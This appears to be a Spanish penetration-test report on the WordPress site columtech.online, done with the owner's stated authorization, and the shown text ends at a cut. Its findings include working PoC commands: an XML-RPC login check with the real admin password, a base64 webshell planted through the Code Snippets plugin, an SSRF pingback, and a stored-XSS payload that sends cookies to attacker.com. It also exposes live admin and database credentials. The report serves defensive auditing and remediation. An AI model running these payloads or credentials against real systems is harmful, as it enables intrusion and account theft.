var(--border); border-radius: 10px; padding: 14px 16px; }\n  .meta .card .k { font-size: 11px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); }\n  .meta .card .v { font-family: var(--mono); font-size: 14px; margin-top: 6px; word-break: break-all; }\n  .author-strip {\n    display: flex; align-items: center; gap: 14px; margin-top: 24px;\n    padding: 12px 16px; border: 1px dashed var(--border); border-radius: 10px;\n    background: rgba(255,255,255,0.02); font-family: var(--mono); font-size: 13px; color: var(--text-dim);\n  }\n  .author-strip strong { color: var(--accent); }\n  .container { max-width: 1100px; margin: 0 auto; padding: 40px; }\n  section { margin-bottom: 60px; }\n  h2 { font-size: 26px; margin: 0 0 18px; letter-spacing: -0.01em; display: flex; align-items: center; gap: 12px; }\n  h2::before { content: ''; width: 4px; height: 22px; background: var(--accent); border-radius: 2px; }\n  h3 { font-size: 19px; margin: 22px 0 10px; }\n  p { color: var(--text); }\n  p.dim { color: var(--text-dim); }\n  .stats { display: grid; grid-template-columns: repeat(5, 1fr); gap: 12px; margin-top: 10px; }\n  .stat { background: var(--panel); border: 1px solid var(--border); border-radius: 12px; padding: 18px; text-align: center; }\n  .stat .num { font-size: 32px; font-weight: 700; font-family: var(--mono); }\n  .stat .lbl { font-size: 12px; text-transform: uppercase; letter-spacing: 0.12em; color: var(--text-dim); margin-top: 6px; }\n  .stat.crit .num { color: var(--crit); } .stat.high .num { color: var(--high); }\n  .stat.med  .num { color: var(--med); }  .stat.low  .num { color: var(--low); }\n  .stat.info .num { color: var(--info); }\n  table.summary { width: 100%; border-collapse: collapse; margin-top: 16px; background: var(--panel); border: 1px solid var(--border); border-radius: 12px; overflow: hidden; }\n  table.summary th, table.summary td { padding: 12px 14px; text-align: left; border-bottom: 1px solid var(--border); font-size: 14px; }\n  table.summary th { background: var(--panel-2); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; color: var(--text-dim); }\n  table.summary tr:last-child td { border-bottom: none; }\n  table.summary tr:hover td { background: rgba(255,255,255,0.02); }\n  .badge { display: inline-block; padding: 3px 9px; border-radius: 4px; font-size: 11px; font-weight: 700; font-family: var(--mono); letter-spacing: 0.05em; text-transform: uppercase; }\n  .badge.crit { background: rgba(255,61,87,0.15); color: var(--crit); border: 1px solid rgba(255,61,87,0.4); }\n  .badge.high { background: rgba(255,139,61,0.13); color: var(--high); border: 1px solid rgba(255,139,61,0.4); }\n  .badge.med  { background: rgba(255,216,74,0.13); color: var(--med);  border: 1px solid rgba(255,216,74,0.4); }\n  .badge.low  { background: rgba(74,198,255,0.13); color: var(--low);  border: 1px solid rgba(74,198,255,0.4); }\n  .badge.info { background: rgba(140,159,176,0.13); color: var(--info); border: 1px solid rgba(140,159,176,0.4); }\n  .finding { background: var(--panel); border: 1px solid var(--border); border-radius: 14px; margin-top: 22px; overflow: hidden; }\n  .finding .head { display: flex; align-items: center; gap: 14px; flex-wrap: wrap; padding: 18px 22px; background: var(--panel-2); border-bottom: 1px solid var(--border); }\n  .finding.crit .head { box-shadow: inset 4px 0 0 0 var(--crit); }\n  .finding.high .head { box-shadow: inset 4px 0 0 0 var(--high); }\n  .finding.med .head  { box-shadow: inset 4px 0 0 0 var(--med); }\n  .finding.low .head  { box-shadow: inset 4px 0 0 0 var(--low); }\n  .finding.info .head { box-shadow: inset 4px 0 0 0 var(--info); }\n  .finding .head .id { font-family: var(--mono); color: var(--text-dim); font-size: 13px; }\n  .finding .head .title { font-size: 17px; font-weight: 600; flex: 1; }\n  .finding .body { padding: 22px; }\n  .finding .body h4 { font-size: 11px; text-transform: uppercase; letter-spacing: 0.14em; color: var(--text-dim); margin: 18px 0 8px; }\n  .finding .body h4:first-child { margin-top: 0; }\n  .finding ul { margin: 0 0 6px; padding-left: 22px; }\n  .finding li { margin-bottom: 4px; }\n  pre, code { font-family: var(--mono); font-size: 13px; }\n  pre { background: var(--code-bg); border: 1px solid var(--border); border-radius: 8px; padding: 14px 16px; overflow-x: auto; line-height: 1.5; color: #d6dbe6; }\n  code.inline { background: rgba(255,255,255,0.05); padding: 1px 6px; border-radius: 4px; border: 1px solid var(--border); font-size: 12px; }\n  .kv { display: grid; grid-template-columns: 160px 1fr; gap: 6px 16px; font-size: 13.5px; }\n  .kv .k { color: var(--text-dim); font-family: var(--mono); font-size: 12px; padding-top: 2px; }\n  .callout { border-left: 3px solid var(--accent); background: rgba(255,77,109,0.05); padding: 14px 18px; border-radius: 0 8px 8px 0; margin: 12px 0; font-size: 14px; }\n  .callout.danger { border-color: var(--crit); background: rgba(255,61,87,0.07); }\n  .callout.warn   { border-color: var(--high); background: rgba(255,139,61,0.06); }\n  .callout.ok     { border-color: var(--ok);  background: rgba(61,220,151,0.06); }\n  footer { border-top: 1px solid var(--border); padding: 36px 40px; margin-top: 40px; color: var(--text-dim); text-align: center; font-size: 13px; background: var(--bg-2); }\n  footer .sig { font-family: var(--mono); font-size: 14px; color: var(--accent); }\n  .chain { background: var(--code-bg); border: 1px solid var(--border); border-radius: 10px; padding: 20px 24px; margin: 14px 0; }\n  .chain-step { display: flex; align-items: flex-start; gap: 14px; margin-bottom: 10px; }\n  .chain-step:last-child { margin-bottom: 0; }\n  .chain-num { background: var(--accent); color: #fff; border-radius: 50%; width: 22px; height: 22px; display: flex; align-items: center; justify-content: center; font-size: 12px; font-weight: 700; flex-shrink: 0; margin-top: 2px; }\n  .chain-text { font-family: var(--mono); font-size: 13px; color: #d6dbe6; }\n  .chain-arrow { color: var(--accent); font-size: 18px; margin: 4px 0; text-align: center; }\n  @media (max-width: 760px) {\n    .hero h1 { font-size: 32px; }\n    .meta, .stats { grid-template-columns: repeat(2, 1fr); }\n    .container, .hero { padding: 30px 22px; }\n  }\n\n\n\n\n\n\n  \n\n    \u258c Auditor\u00eda de Seguridad \u00b7 2026-06-03/04\n    \nColumtech OnlineInforme de Seguridad Web\n    \nEvaluaci\u00f3n de seguridad completa de columtech.online. Resultado: compromiso total \u2014 admin WordPress, RCE como www-data, defacing demostrado, escalada a root bloqueada por hardening excepcional.\n\n    \n\n      \n\nObjetivo\ncolumtech.online\n      \n\nBackend\nApache 2.4.66 \u00b7 PHP 8.2.30 \u00b7 MySQL 8.0.45\n      \n\nStack\nWP 7.0 \u00b7 Elementor 4.0.2 \u00b7 Docker \u00b7 Cloudflare \u00b7 Caddy\n      \n\nFecha\n2026-06-03 / 04\n    \n\n    \n\n      Autor del informe \u00b7 c4sh3r \u00b7 auditor\u00eda solicitada por el propietario del dominio \u00b7 autorizaci\u00f3n total\n    \n  \n\n\n\n\n\n  \n\n    \nResumen Ejecutivo\n    \nSe realiz\u00f3 una auditor\u00eda de seguridad end-to-end sobre columtech.online, un portal WordPress operado por el propietario con fines de pr\u00e1ctica y aprendizaje. La evaluaci\u00f3n cubri\u00f3 reconocimiento pasivo, enumeraci\u00f3n de usuarios, an\u00e1lisis de superficie de ataque en plugins y XML-RPC, explotaci\u00f3n de credenciales d\u00e9biles, post-explotaci\u00f3n como www-data dentro de un contenedor Docker, demostraci\u00f3n de defacing y exploraci\u00f3n exhaustiva de escalada de privilegios a root.\n    \nEl sitio fue comprometido completamente a nivel de aplicaci\u00f3n: acceso de administrador WordPress, ejecuci\u00f3n remota de c\u00f3digo como www-data, lectura/escritura del sistema de archivos y defacing demostrado. La escalada a root dentro del contenedor fue bloqueada por un perfil de hardening que combina seccomp, AppArmor y ptrace_scope=3, resistiendo todos los CVEs p\u00fablicos conocidos para kernel 6.8.\n    \nSe descubri\u00f3 adicionalmente una webshell real de un atacante externo (wp-loginizer.php \u2014 WSO Mr.X v2.5 con beacon a cdn.privdayz.com) que requiere eliminaci\u00f3n inmediata.\n\n    \n\n      Riesgo principal: Contrase\u00f1a de administrador d\u00e9bil marce:marce123 accesible v\u00eda XML-RPC sin rate-limit \u2192 compromiso total del sitio en minutos.\n    \n\n    \n\n      \n\n3\nCr\u00edticos\n      \n\n4\nAltos\n      \n\n4\nMedios\n      \n\n4\nBajos\n      \n\n3\nInformativos\n    \n  \n\n  \n\n    \nCadena de Ataque Demostrada\n    \n\n      \n\n1\nREST API bypass (?rest_route=/wp/v2/users) \u2192 enum admin marce (id=1) + prueba (id=2) + columtech (id=3)\n      \n\u2193\n      \n\n2\nGravatar SHA-256 reverse \u2192 email de prueba: prueba@gmail.com\n      \n\u2193\n      \n\n3\nXML-RPC wp.getUsersBlogs (credential oracle sin rate-limit) \u2192 marce:marce123 [administrator]\n      \n\u2193\n      \n\n4\nAdmin WP \u2192 REST API POST /wp/v2/plugins \u2192 instalaci\u00f3n code-snippets plugin\n      \n\u2193\n      \n\n5\nCode Snippets PHP snippet \u2192 RCE como www-data \u00b7 uid=33 \u00b7 hostname 6c49a066ba4c\n      \n\u2193\n      \n\n6\nDefacing: t\u00edtulo del sitio + sticky post + p\u00e1gina est\u00e1tica con matrix rain / glitch effects\n      \n\u2193\n      \n\n7\nEscalada: 12 CVEs y t\u00e9cnicas probadas \u2192 bloqueadas por seccomp + AppArmor + ptrace_scope=3\n    \n  \n\n  \n\n    \nAlcance y Metodolog\u00eda\n    \n\n      \nObjetivo\nhttps://www.columtech.online \u2014 WordPress 7.0 + Elementor 4.0.2 + plugin Filester/elFinder\n      \nTipo\nCaja negra \u2192 caja gris (tras obtener credenciales) \u00b7 sin acceso previo a servidor\n      \nAutorizaci\u00f3n\nDominio propiedad del solicitante \u00b7 auditor\u00eda completa autorizada verbalmente\n      \nIdentificaci\u00f3n\nTodas las peticiones etiquetadas con User-Agent: c4sh3r y X-Bug-Bounty: c4sh3r\n      \nNo destructivo\nEl defacing fue demostrado y revertido. Ficheros de prueba eliminados. No se destruy\u00f3 ni borr\u00f3 informaci\u00f3n real del sitio.\n      \nHerramientas\ncurl, Python 3, LinPEAS, bore (tunnel), GCC, git (exploit repos), b\u00fasqueda web de CVEs en tiempo real\n    \n  \n\n  \n\n    \nResumen de Hallazgos\n    \n\n      IDSeveridadHallazgoComponente\n      \n        C-01Cr\u00edticoCredencial admin d\u00e9bil \u2014 acceso total v\u00eda XML-RPCWordPress \u00b7 XML-RPC\n        C-02Cr\u00edticoWebshell externa preexistente (WSO Mr.X)wp-loginizer.php\n        C-03Cr\u00edticoRCE como www-data v\u00eda Code Snippets pluginWordPress \u00b7 Code Snippets REST\n        H-01AltoXML-RPC expuesto \u2014 SSRF + credential oracle sin rate-limitxmlrpc.php\n        H-02AltoCVE-2026-6127 Elementor XSS almacenado v\u00eda REST APIElementor 4.0.2 \u2264 4.0.4\n        H-03AltoEnumeraci\u00f3n de usuarios por 4 v\u00edas sin rate-limitREST API \u00b7 wp-login \u00b7 lostpassword\n        H-04AltoNonce de plugin expuesto en REST sin autenticaci\u00f3nFilevue \u00b7 /wp/v2/pages/7\n        M-01MedioWordPress 7.0 / Elementor 4.0.2 \u2014 versiones desactualizadasCore + plugins\n        M-02MedioEmail de usuario deducible por Gravatar hash (SHA-256)REST API \u00b7 Gravatar\n        M-03MedioRecuperaci\u00f3n de contrase\u00f1a rota + oracle de usuariowp-login.php \u00b7 lostpassword\n        M-04Mediowp-cron.php accesible p\u00fablicamentewp-cron.php\n        L-01BajoCabeceras de seguridad ausentes (HSTS, X-Content-Type, Permissions-Policy)HTTP Headers \u00b7 Caddy\n        L-02BajoOrigen Apache/versi\u00f3n filtrado en respuestas 404Apache 2.4.66 \u00b7 Cloudflare bypass\n        L-03Bajoreadme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WPWordPress Core\n        L-04BajoCVE-2026-24072 Apache 2.4.66 mod_rewrite htaccess readApache 2.4.66\n        I-01InfoContenedor Docker con hardening seccomp/AppArmor efectivoInfraestructura\n        I-02InfoDB creds en claro en variable de entorno del containerDocker env \u00b7 WORDPRESS_DB_*\n        I-03InfoKernel 6.8.0-117 vulnerable a CVE-2026-46333 pero bloqueado por seccompKernel \u00b7 pidfd_getfd\n      \n    \n  \n\n  \n\n    \nHallazgos Detallados\n\n    \n    \n\n      \n\n        C-01\n        Cr\u00edtico\n        Credencial de administrador d\u00e9bil \u2014 compromiso total v\u00eda XML-RPC\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa cuenta de administrador marce ten\u00eda la contrase\u00f1a marce123. XML-RPC no implementa rate-limiting, permitiendo descubrirla mediante credential oracle con pocas decenas de intentos. Una vez autenticados, se obtuvo acceso total: lectura de opciones del sitio, creaci\u00f3n/edici\u00f3n de posts, subida de ficheros y instalaci\u00f3n de plugins.\n        \nPoC\n        \n# Descubrimiento de credenciales v\u00eda XML-RPC oracle\ncurl -X POST https://www.columtech.online/xmlrpc.php \\\n  -d '<?xml version=\"1.0\"?><methodCall>\n       <methodName>wp.getUsersBlogs</methodName>\n       <params>\n         <param><value><string>marce</string></value></param>\n         <param><value><string>marce123</string></value></param>\n       </params></methodCall>'\n\n# Respuesta: isAdmin=1, blogName=Laboratorio\n# RESULTADO: acceso de administrador confirmado\n        \nImpacto\n        \n\n          \nAcceso completo al panel de administraci\u00f3n WordPress\n          \nInstalaci\u00f3n de plugins arbitrarios \u2192 RCE\n          \nLectura/escritura de todos los contenidos y usuarios\n          \nDefacing del sitio demostrado\n          \nSubida de ficheros al servidor\n        \n        \nRemediaci\u00f3n\n        \n# 1. Cambiar contrase\u00f1a inmediatamente (m\u00ednimo 20 chars, aleatoria)\n# 2. Deshabilitar XML-RPC si no se usa Jetpack/app m\u00f3vil\nadd_filter('xmlrpc_enabled', '__return_false');\n\n# 3. Alternativamente, bloquear en Caddy/Cloudflare\n# Cloudflare WAF rule: (http.request.uri.path eq \"/xmlrpc.php\") \u2192 Block\n      \n    \n\n    \n    \n\n      \n\n        C-02\n        Cr\u00edtico\n        Webshell externa preexistente \u2014 WSO Mr.X v2.5\n      \n      \n\n        \nDescripci\u00f3n\n        \nSe encontr\u00f3 /var/www/html/wp-loginizer.php (237 KB), una webshell WSO (\u00abWeb Shell by orb\u00bb) Mr.X BYPASS v2.5 completamente funcional. El fichero incluye un file manager con terminal, file editor, y un beacon de tracking que reporta la URL de cada visita a https://cdn.privdayz.com/images/logo.jpg. El sitio fue comprometido por un atacante externo antes de esta auditor\u00eda (posts de spam en ruso desde 2023).\n        \nPoC\n        \ncurl https://www.columtech.online/wp-loginizer.php\n# Responde con file manager completo (sin autenticaci\u00f3n adicional)\n# Contiene: terminal, editor de archivos, upload\n# BEACON: POST a cdn.privdayz.com con location.href del visitante\n        \nImpacto\n        \n\n          \nAtacante externo tiene acceso de shell activo como www-data\n          \nExfiltraci\u00f3n de datos de visitantes a servidor tercero (privdayz.com)\n          \nPosible pivoting a base de datos y archivos\n          \nRGPD/privacidad: beacon rastrea IPs de visitantes\n        \n        \nRemediaci\u00f3n\n        \n# URGENTE \u2014 eliminar el fichero inmediatamente\nrm /var/www/html/wp-loginizer.php\nrm /var/www/html/2ops.php     # file manager adicional\nrm /var/www/html/x.php        # webshell de auditor\u00eda (nuestro)\nrm /var/www/html/rs.php       # reverse shell de auditor\u00eda (nuestro)\nrm /var/www/html/rs2.php      # reverse shell de auditor\u00eda (nuestro)\n\n# Auditar TODOS los archivos modificados en los \u00faltimos 90 d\u00edas:\nfind /var/www/html -newer /var/www/html/wp-config.php -name \"*.php\" | sort\n      \n    \n\n    \n    \n\n      \n\n        C-03\n        Cr\u00edtico\n        RCE como www-data v\u00eda Code Snippets REST API\n      \n      \n\n        \nDescripci\u00f3n\n        \nCon acceso de administrador, se instal\u00f3 el plugin Code Snippets v\u00eda REST API autenticada (POST /wp/v2/plugins). El plugin expone una API REST que permite crear snippets PHP que se ejecutan en cada carga de p\u00e1gina. Se cre\u00f3 un snippet con webshell (shell_exec(base64_decode($_GET['c4sh3r']))) que ejecuta comandos arbitrarios como uid=33(www-data).\n        \nPoC\n        \n# Instalar plugin\ncurl -X POST https://columtech.online/index.php?rest_route=/wp/v2/plugins \\\n  -H \"X-WP-Nonce: $NONCE\" -H \"Cookie: $ADMIN_COOKIES\" \\\n  -d '{\"slug\":\"code-snippets\",\"status\":\"active\"}'\n\n# Crear snippet webshell\ncurl -X POST https://columtech.online/index.php?rest_route=/code-snippets/v1/snippets \\\n  -H \"X-WP-Nonce: $NONCE\" \\\n  -d '{\"code\":\"if(isset($_GET[\\\"c4sh3r\\\"])){die(shell_exec(base64_decode($_GET[\\\"c4sh3r\\\"])));}\", \"scope\":\"front-end\",\"active\":true}'\n\n# Ejecutar comando\ncurl \"https://columtech.online/?c4sh3r=$(echo -n 'id' | base64)\"\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n        \nImpacto\n        \n\n          \nEjecuci\u00f3n remota de comandos en el servidor\n          \nLectura de wp-config.php y credenciales de base de datos\n          \nEscritura en /var/www/html (filesystem del host)\n          \nDefacing del sitio completo\n          \nReverse shell interactiva al atacante demostrada\n        \n        \nRemediaci\u00f3n\n        \n# Eliminar plugin Code Snippets y snippet malicioso\n# Revisar y eliminar TODOS los plugins no esenciales\n# Cambiar credenciales admin PRIMERO (ver C-01)\n# Implementar WAF rule para bloquear par\u00e1metros ?c4sh3r=\n      \n    \n\n    \n    \n\n      \n\n        H-01\n        Alto\n        XML-RPC expuesto \u2014 SSRF confirmado + amplificaci\u00f3n de credential testing\n      \n      \n\n        \nDescripci\u00f3n\n        \nxmlrpc.php est\u00e1 habilitado con system.multicall disponible. El m\u00e9todo pingback.ping causa que el servidor realice peticiones HTTP salientes arbitrarias (SSRF). Se confirm\u00f3 que el servidor intenta alcanzar 169.254.169.254 (metadata cloud) y puede escanear puertos internos por diferencia de tiempos.\n        \nPoC\n        \n# SSRF \u2014 servidor hace fetch a URL controlada por atacante\ncurl -X POST https://columtech.online/xmlrpc.php \\\n  -d '<methodCall><methodName>pingback.ping</methodName>\n       <params>\n         <param><value><string>http://169.254.169.254/</string></value></param>\n         <param><value><string>https://columtech.online/?p=1</string></value></param>\n       </params></methodCall>'\n\n# Resultado: 11.3s timeout \u2192 servidor alcanza metadata endpoint\n# Externo (example.com): 1.3s | Interno (localhost:80): 0.3s\n        \nImpacto\n        \n\n          \nSSRF: escaneo de puertos/servicios internos y metadata cloud\n          \nsystem.multicall: amplificaci\u00f3n de credential testing sin generar logs proporcionales\n          \nPingback abuse: DDoS contra terceros usando el servidor como amplificador\n        \n        \nRemediaci\u00f3n\n        \nadd_filter('xmlrpc_enabled', '__return_false');\n# O bloquear en Cloudflare/Caddy si se necesita para Jetpack\n      \n    \n\n    \n    \n\n      \n\n        H-02\n        Alto\n        CVE-2026-6127 \u2014 Elementor 4.0.2 Stored XSS v\u00eda REST API (form-encoded PATCH)\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (CVSS 6.4). El campo _elementor_data se registra con show_in_rest sin sanitize_callback. Un atacante con rol Contributor+ puede enviar una petici\u00f3n PATCH form-encoded (no JSON) y la sanitizaci\u00f3n se salta completamente, almacenando JavaScript arbitrario que se ejecuta para cualquier visitante, incluyendo el administrador.\n        \nPoC\n        \ncurl -X PATCH https://columtech.online/index.php?rest_route=/wp/v2/posts/1 \\\n  -H \"Authorization: Basic $(echo -n 'contributor:pass' | base64)\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  --data-urlencode 'meta[_elementor_edit_mode]=builder' \\\n  --data-urlencode 'meta[_elementor_data]=[{\"elType\":\"widget\",\"widgetType\":\"html\",\"settings\":{\"html\":\"<svg/onload=fetch(\\\"//attacker.com/\\\"+document.cookie)>\"}}]'\n        \nImpacto\n        \n\n          \nXSS persistente \u2192 robo de session cookies del administrador\n          \nAccount takeover del administrador cuando visita la p\u00e1gina\n          \nCadena hacia defacing y RCE desde XSS (auto-crear admin v\u00eda fetch)\n        \n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor a \u2265 4.0.5\n# Workaround: restringir rol Contributor a usuarios de confianza\n      \n    \n\n    \n    \n\n      \n\n        H-03\n        Alto\n        Enumeraci\u00f3n de usuarios admin por 4 v\u00edas sin rate-limit\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl username del administrador (marce) se obtiene por al menos 4 m\u00e9todos distintos, ninguno protegido por rate-limit ni captcha:\n        \nPoC\n        \n# M\u00e9todo 1: REST API bypass del filtro de Caddy\ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/users\"\n# [{\"id\":1,\"slug\":\"marce\",...},{\"id\":2,\"slug\":\"prueba\",...}]\n\n# M\u00e9todo 2: author redirect\ncurl -I \"https://columtech.online/?author=1\"\n# 301 \u2192 /author/marce/\n\n# M\u00e9todo 3: wp-login oracle (respuesta diferente seg\u00fan usuario)\n# v\u00e1lido: \"la contrase\u00f1a que has introducido para marce no es correcta\"\n# inv\u00e1lido: \"El nombre de usuario nope123 no est\u00e1 registrado\"\n\n# M\u00e9todo 4: lostpassword oracle\n# v\u00e1lido: \"no se pudo enviar el correo electr\u00f3nico\" (usuario S\u00cd existe)\n# inv\u00e1lido: \"no hay ninguna cuenta con ese nombre de usuario\"\n        \nRemediaci\u00f3n\n        \n# Restringir REST users a autenticados:\nadd_filter('rest_endpoints', function($ep){\n    if(isset($ep['/wp/v2/users'])) unset($ep['/wp/v2/users']);\n    return $ep;\n});\n# Unificar mensajes de error de wp-login y lostpassword\n# Bloquear ?author= redirect\n      \n    \n\n    \n    \n\n      \n\n        H-04\n        Alto\n        Nonce de plugin Filevue expuesto en REST API sin autenticaci\u00f3n\n      \n      \n\n        \nDescripci\u00f3n\n        \nLa p\u00e1gina \u00abClient Portal\u00bb (ID=7) contiene el formulario de login del plugin Filevue con un nonce WordPress (_wpnonce) embebido en el HTML renderizado. Este HTML es devuelto por la REST API GET /wp/v2/pages/7 sin autenticaci\u00f3n, exponiendo el nonce a cualquier atacante.\n        \nPoC\n        \ncurl \"https://columtech.online/index.php?rest_route=/wp/v2/pages/7\" | \\\n  grep -o '_wpnonce\" value=\"[^\"]*\"'\n# _wpnonce\" value=\"ecd04e0712\"\n\n# El nonce permite enviar peticiones autenticadas a admin-post.php\n# sin estar logueado \u2014 usado para probar SQLi en filevue_client_login\n        \nRemediaci\u00f3n\n        \n# No embeber nonces en contenido REST p\u00fablico\n# Restringir /wp/v2/pages a usuarios autenticados o excluir p\u00e1gina Client Portal\n# Generar nonce en el lado cliente (JS) tras autenticaci\u00f3n\n      \n    \n\n    \n    \n\n      \n\n        M-01\n        Medio\n        Versiones desactualizadas \u2014 WordPress 7.0 / Elementor 4.0.2 / Apache 2.4.66\n      \n      \n\n        \nDescripci\u00f3n\n        \nElementor 4.0.2 es vulnerable a CVE-2026-6127 (parcheado en 4.0.5). Apache 2.4.66 es vulnerable a CVE-2026-23918 (RCE HTTP/2) y CVE-2026-24072 (read bypass via htaccess), ambos parcheados en 2.4.67. El meta generator expone versiones exactas.\n        \nRemediaci\u00f3n\n        \n# Actualizar Elementor: wp plugin update elementor\n# Actualizar Apache: apt-get upgrade apache2\n# Eliminar generator meta:\nremove_action('wp_head', 'wp_generator');\n# Eliminar readme.html y license.txt del webroot\n      \n    \n\n    \n    \n\n      \n\n        M-02\n        Medio\n        Email de usuario deducible por reverse Gravatar SHA-256\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas URLs de avatar Gravatar incluyen el hash SHA-256 del email normalizado del usuario. El email de la cuenta prueba (prueba@gmail.com) fue deducido probando candidatos comunes contra el hash expuesto p\u00fablicamente en GET /wp/v2/users/2.\n        \nPoC\n        \nimport hashlib\nhash_target = \"913ef45dd4e1f647359a846bca8bffb8d25b22f2a79d34d71c9c90ef0eb53024\"\nfor email in [\"prueba@gmail.com\", ...]:\n    if hashlib.sha256(email.encode()).hexdigest() == hash_target:\n        print(\"MATCH:\", email)\n# MATCH: prueba@gmail.com\n        \nRemediaci\u00f3n\n        \n# Desactivar Gravatar en WordPress (usar avatar local)\n# O usar un email que no sea predecible para cuentas sensibles\n      \n    \n\n    \n    \n\n      \n\n        M-03\n        Medio\n        Recuperaci\u00f3n de contrase\u00f1a rota + oracle de usuario\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl formulario de recuperaci\u00f3n de contrase\u00f1a falla con el error \u00abno se pudo enviar el correo electr\u00f3nico\u00bb para usuarios v\u00e1lidos, y \u00abno hay ninguna cuenta\u00bb para usuarios inexistentes. Esto act\u00faa como or\u00e1culo de enumeraci\u00f3n. Adem\u00e1s, el correo no se env\u00eda, por lo que el reset es inoperable \u2014 impacto en disponibilidad y posible vector de host-header injection si se configura SMTP en el futuro.\n        \nRemediaci\u00f3n\n        \n# 1. Configurar SMTP (WP Mail SMTP o Mailgun)\n# 2. Unificar mensaje de error (no revelar si usuario existe)\n# 3. Fijar siteurl y home en wp-config.php para prevenir host-header injection\ndefine('WP_SITEURL', 'https://www.columtech.online');\ndefine('WP_HOME', 'https://www.columtech.online');\n      \n    \n\n    \n    \n\n      \n\n        M-04\n        Medio\n        wp-cron.php accesible p\u00fablicamente\n      \n      \n\n        \nDescripci\u00f3n\n        \nwp-cron.php devuelve HTTP 200 y puede ser llamado externamente. Permite amplificar la carga del servidor llam\u00e1ndolo en bucle, actuando como vector de DoS.\n        \nRemediaci\u00f3n\n        \n# En wp-config.php:\ndefine('DISABLE_WP_CRON', true);\n# En crontab del servidor:\n*/5 * * * * curl -s https://www.columtech.online/wp-cron.php?doing_wp_cron=1 >/dev/null\n      \n    \n\n    \n    \n\n      \n\n        L-01\n        Bajo\n        Cabeceras de seguridad HTTP ausentes\n      \n      \n\n        \nDescripci\u00f3n\n        \nFaltan Strict-Transport-Security (HSTS), X-Content-Type-Options: nosniff y Permissions-Policy. La CSP solo cubre frame-ancestors 'self'.\n        \nRemediaci\u00f3n\n        \n# En Caddy (Caddyfile):\nheader Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\nheader X-Content-Type-Options \"nosniff\"\nheader Permissions-Policy \"geolocation=(), microphone=(), camera=()\"\n      \n    \n\n    \n    \n\n      \n\n        L-02\n        Bajo\n        Divulgaci\u00f3n de origen Apache y versi\u00f3n en p\u00e1ginas 404\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas p\u00e1ginas 404 generadas por Apache revelan: Apache/2.4.66 (Debian) Server at www.columtech.online Port 80 \u2014 versi\u00f3n exacta, distribuci\u00f3n y que escucha en puerto 80 sin TLS.\n        \nRemediaci\u00f3n\n        \n# En apache2.conf:\nServerTokens Prod\nServerSignature Off\n      \n    \n\n    \n    \n\n      \n\n        L-03\n        Bajo\n        readme.html accesible \u2014 divulgaci\u00f3n de versi\u00f3n WordPress\n      \n      \n\n        \nDescripci\u00f3n\n        \n/readme.html devuelve HTTP 200 y revela la versi\u00f3n exacta de WordPress. Facilita targeting con CVEs de versi\u00f3n espec\u00edfica.\n        \nRemediaci\u00f3n\n        \nrm /var/www/html/readme.html /var/www/html/license.txt\n      \n    \n\n    \n    \n\n      \n\n        L-04\n        Bajo\n        CVE-2026-24072 Apache 2.4.66 \u2014 htaccess mod_rewrite file read\n      \n      \n\n        \nDescripci\u00f3n\n        \nApache 2.4.66 es vulnerable a CVE-2026-24072: un usuario con acceso de escritura a .htaccess puede leer ficheros fuera de su directorio con los privilegios del proceso httpd. En este caso, www-data ya tiene ese acceso, pero el vector es relevante en escenarios multiusuario.\n        \nRemediaci\u00f3n\n        \n# Actualizar Apache a 2.4.67+\napt-get upgrade apache2\n      \n    \n\n    \n    \n\n      \n\n        I-01\n        Info\n        Hardening de contenedor Docker \u2014 seccomp + AppArmor + ptrace_scope=3\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl contenedor Docker presenta un perfil de hardening excepcional que bloque\u00f3 todos los CVEs de escalada de privilegios probados (12 t\u00e9cnicas distintas). Los syscalls AF_ALG, CLONE_NEWUSER, io_uring_setup y pidfd_getfd est\u00e1n bloqueados por seccomp. AppArmor docker-default bloquea escrituras a ficheros de sistema. ptrace_scope=3 impide toda inspecci\u00f3n de procesos. Este es el nivel de hardening correcto para workloads en producci\u00f3n.\n        \nCVEs probados y bloqueados\n        \nCVE-2026-31431 (Copy Fail)     \u2192 AF_ALG bloqueado por seccomp\nCVE-2026-43284 (Dirty Frag)    \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46300 (Fragnesia)     \u2192 CLONE_NEWUSER bloqueado\nCVE-2026-46333 (ssh-keysign)   \u2192 pidfd_getfd bloqueado\nio_uring exploits              \u2192 io_uring_setup bloqueado\nGameOver(lay)                  \u2192 CLONE_NEWUSER bloqueado\nCrackArmor                     \u2192 AppArmor FS inaccesible en container\nCVE-2026-27456 (mount TOCTOU)  \u2192 Sin /etc/fstab user,loop entries\ngpasswd shadow attack          \u2192 AppArmor bloquea escritura /etc/gshadow\n      \n    \n\n    \n    \n\n      \n\n        I-02\n        Info\n        Credenciales DB en texto claro en variables de entorno del container\n      \n      \n\n        \nDescripci\u00f3n\n        \nLas credenciales de MySQL est\u00e1n accesibles en texto claro v\u00eda /proc/self/environ para cualquier proceso del container (incluyendo www-data tras RCE):\n        \nWORDPRESS_DB_HOST=wordpress_db:3306\nWORDPRESS_DB_USER=wp_user\nWORDPRESS_DB_PASSWORD=wp_password\nWORDPRESS_DB_NAME=wordpress\n        \nRemediaci\u00f3n\n        \n# Usar Docker secrets en lugar de env vars para credenciales\n# O montar fichero de config encriptado desde un secrets manager\n      \n    \n\n    \n    \n\n      \n\n        I-03\n        Info\n        Kernel 6.8.0-117 vulnerable a CVE-2026-46333 (bloqueado por seccomp)\n      \n      \n\n        \nDescripci\u00f3n\n        \nEl kernel 6.8.0-117-generic (compilado el 5 Mayo 2026) es anterior al fix de CVE-2026-46333 (publicado el 14 Mayo 2026). La vulnerabilidad permite leer /etc/shadow mediante una race condition en __ptrace_may_access() + pidfd_getfd. El seccomp del container bloquea el syscall pidfd_getfd (438), mitigando completamente el exploit. Se verific\u00f3 que el exploit p\u00fablico 